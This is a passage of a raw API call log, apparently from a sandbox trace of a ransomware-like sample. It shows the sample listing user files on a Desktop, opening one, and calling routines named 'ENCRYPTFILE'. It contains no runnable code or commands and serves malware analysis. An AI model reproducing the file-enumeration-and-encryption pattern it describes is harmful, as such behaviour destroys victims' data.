ftCreationTime.dwLowDateTime=0x63fe0ce0, ftCreationTime.dwHighDateTime=0x1d5e9f9, ftLastAccessTime.dwLowDateTime=0x1c3d5830, ftLastAccessTime.dwHighDateTime=0x1d5f006, ftLastWriteTime.dwLowDateTime=0x1c3d5830, ftLastWriteTime.dwHighDateTime=0x1d5f006, nFileSizeHigh=0x0, nFileSizeLow=0x4c98, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="D-AgzySFKdtUp0Q.doc", cAlternateFileName="D-AGZY~1.DOC")) returned 1 [0128.820] FindNextFileW (in: hFindFile=0x41ac100, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb24f7de0, ftCreationTime.dwHighDateTime=0x1d5ea8d, ftLastAccessTime.dwLowDateTime=0xbb1d0940, ftLastAccessTime.dwHighDateTime=0x1d5ee59, ftLastWriteTime.dwLowDateTime=0xbb1d0940, ftLastWriteTime.dwHighDateTime=0x1d5ee59, nFileSizeHigh=0x0, nFileSizeLow=0x941f, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="dcplTjPjl4z2QV.odp", cAlternateFileName="DCPLTJ~1.ODP")) returned 1 [0128.842] FindNextFileW (in: hFindFile=0x41ac100, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x918ea820, ftCreationTime.dwHighDateTime=0x1d5e45b, ftLastAccessTime.dwLowDateTime=0x4b543b90, ftLastAccessTime.dwHighDateTime=0x1d5ef19, ftLastWriteTime.dwLowDateTime=0x4b543b90, ftLastWriteTime.dwHighDateTime=0x1d5ef19, nFileSizeHigh=0x0, nFileSizeLow=0x17606, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="g6f-14R3g3sZGYbIp.jpg", cAlternateFileName="G6F-14~1.JPG")) returned 1 [0128.842] FindNextFileW (in: hFindFile=0x41ac100, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77d0c400, ftCreationTime.dwHighDateTime=0x1d5ebc6, ftLastAccessTime.dwLowDateTime=0x6603a40, ftLastAccessTime.dwHighDateTime=0x1d5eb48, ftLastWriteTime.dwLowDateTime=0x6603a40, ftLastWriteTime.dwHighDateTime=0x1d5eb48, nFileSizeHigh=0x0, nFileSizeLow=0x13c5b, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="Jk_T2yqTjjg2-B-HH.flv", cAlternateFileName="JK_T2Y~1.FLV")) returned 1 [0128.842] FindNextFileW (in: hFindFile=0x41ac100, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58235170, ftCreationTime.dwHighDateTime=0x1d5e3d0, ftLastAccessTime.dwLowDateTime=0x4ffd3e60, ftLastAccessTime.dwHighDateTime=0x1d5ebf1, ftLastWriteTime.dwLowDateTime=0x4ffd3e60, ftLastWriteTime.dwHighDateTime=0x1d5ebf1, nFileSizeHigh=0x0, nFileSizeLow=0x6a36, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="lB o7wz9.bmp", cAlternateFileName="LBO7WZ~1.BMP")) returned 1 [0128.842] FindNextFileW (in: hFindFile=0x41ac100, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dadc4a0, ftCreationTime.dwHighDateTime=0x1d5f0b5, ftLastAccessTime.dwLowDateTime=0xc976ad70, ftLastAccessTime.dwHighDateTime=0x1d5e747, ftLastWriteTime.dwLowDateTime=0xc976ad70, ftLastWriteTime.dwHighDateTime=0x1d5e747, nFileSizeHigh=0x0, nFileSizeLow=0xb5e4, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="M9-n.avi", cAlternateFileName="")) returned 1 [0128.842] FindNextFileW (in: hFindFile=0x41ac100, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52c95190, ftCreationTime.dwHighDateTime=0x1d5eb3f, ftLastAccessTime.dwLowDateTime=0x8d217aa0, ftLastAccessTime.dwHighDateTime=0x1d5e245, ftLastWriteTime.dwLowDateTime=0x8d217aa0, ftLastWriteTime.dwHighDateTime=0x1d5e245, nFileSizeHigh=0x0, nFileSizeLow=0x135da, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="MjT96UMRMqqhF.swf", cAlternateFileName="MJT96U~1.SWF")) returned 1 [0128.842] FindNextFileW (in: hFindFile=0x41ac100, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c618140, ftCreationTime.dwHighDateTime=0x1d5ee39, ftLastAccessTime.dwLowDateTime=0x494d4a60, ftLastAccessTime.dwHighDateTime=0x1d5e589, ftLastWriteTime.dwLowDateTime=0x494d4a60, ftLastWriteTime.dwHighDateTime=0x1d5e589, nFileSizeHigh=0x0, nFileSizeLow=0x132ca, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="PhzRCCH.jpg", cAlternateFileName="")) returned 1 [0128.843] FindNextFileW (in: hFindFile=0x41ac100, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x817bb4b0, ftCreationTime.dwHighDateTime=0x1d5e329, ftLastAccessTime.dwLowDateTime=0x1f1ffa10, ftLastAccessTime.dwHighDateTime=0x1d5e2f2, ftLastWriteTime.dwLowDateTime=0x1f1ffa10, ftLastWriteTime.dwHighDateTime=0x1d5e2f2, nFileSizeHigh=0x0, nFileSizeLow=0x13845, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="xvNld.ots", cAlternateFileName="")) returned 1 [0128.843] FindNextFileW (in: hFindFile=0x41ac100, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x43c34c0, ftCreationTime.dwLowDateTime=0x43e26e0, ftCreationTime.dwHighDateTime=0xdf0000, ftLastAccessTime.dwLowDateTime=0xdf01c4, ftLastAccessTime.dwHighDateTime=0x11, ftLastWriteTime.dwLowDateTime=0xdf0000, ftLastWriteTime.dwHighDateTime=0x20, nFileSizeHigh=0x43c3574, nFileSizeLow=0x43c34dc, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="", cAlternateFileName="兩мńဓ+\x10")) returned 0 [0128.843] FindClose (in: hFindFile=0x41ac100 | out: hFindFile=0x41ac100) returned 1 [0128.843] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|-ibxuw5BT.mp4|1aQmLq17nlG1P.bmp|5N nlGCuCJHLr.gif|5qUH.doc|b029yG4LTNtgmmqX_G.odp|D-AgzySFKdtUp0Q.doc|dcplTjPjl4z2QV.odp|g6f-14R3g3sZGYbIp.jpg|Jk_T2yqTjjg2-B-HH.flv|lB o7wz9.bmp|M9-n.avi|MjT96UMRMqqhF.swf|PhzRCCH.jpg|xvNld.ots", cchCount1=227, lpString2="", cchCount2=0) returned 3 [0128.843] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0128.843] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\-ibxuw5BT.mp4", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce390d0, ftCreationTime.dwHighDateTime=0x1d5efbf, ftLastAccessTime.dwLowDateTime=0x4f30df70, ftLastAccessTime.dwHighDateTime=0x1d5ed2a, ftLastWriteTime.dwLowDateTime=0x4f30df70, ftLastWriteTime.dwHighDateTime=0x1d5ed2a, nFileSizeHigh=0x0, nFileSizeLow=0x8d0a, dwReserved0=0xdf0b28, dwReserved1=0x8, cFileName="-ibxuw5BT.mp4", cAlternateFileName="-IBXUW~1.MP4")) returned 0x41ac140 [0128.844] FindClose (in: hFindFile=0x41ac140 | out: hFindFile=0x41ac140) returned 1 [0128.844] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0128.844] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0128.844] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0128.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0128.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cada8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0128.845] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\-ibxuw5BT.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\-ibxuw5bt.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0128.845] FreeLibrary (hLibModule=0x772d0000) returned 1 [0128.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0128.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9350 [0128.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0128.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0128.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0128.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0128.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0128.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0128.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0128.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0128.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0128.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0128.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0128.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0128.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e18 [0128.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0128.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0128.846] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0128.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0128.846] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0128.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0128.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0128.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0128.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0128.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0128.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0128.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0128.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0128.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0128.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0128.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0128.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0128.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0128.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0128.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0128.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0128.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0128.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0128.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0128.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0128.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0128.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0128.848] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0128.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0128.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0128.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0128.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0128.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0128.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0128.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0128.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0128.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0128.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0128.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0128.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0128.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0128.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0128.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0128.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0128.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0128.849] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0128.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0128.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0128.850] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0128.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa48 [0128.850] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43caa48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0128.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0128.850] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0128.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0128.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0128.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0128.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0128.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0128.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0128.850] CloseHandle (hObject=0x258) returned 1 [0128.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0128.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8f00 [0128.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0128.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0128.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0128.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0128.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0128.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0128.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0128.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0128.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0128.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0128.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0128.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0128.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0128.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0128.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0128.852] FreeLibrary (hLibModule=0x772d0000) returned 1 [0128.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0128.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0128.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0128.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0128.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0128.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0128.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0128.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0128.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0128.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0128.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0128.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0128.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0128.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0128.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0128.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0128.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0128.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0128.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0128.853] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0128.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0128.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0128.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0128.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0128.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0128.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0128.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0128.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0128.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0128.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0128.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0128.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0128.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0128.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0128.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0128.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0128.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0128.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0128.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0128.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0128.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0128.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0128.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0128.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0128.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0128.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac100 [0128.855] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0128.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0128.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392618 [0128.855] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0128.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392618 | out: hHeap=0x1780000) returned 1 [0128.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0128.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0128.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25c0 [0128.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0128.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0128.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0128.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0128.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0128.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25e0 [0128.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0128.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0128.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0128.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0128.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0128.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0128.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0128.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0128.858] HeapFree (in: 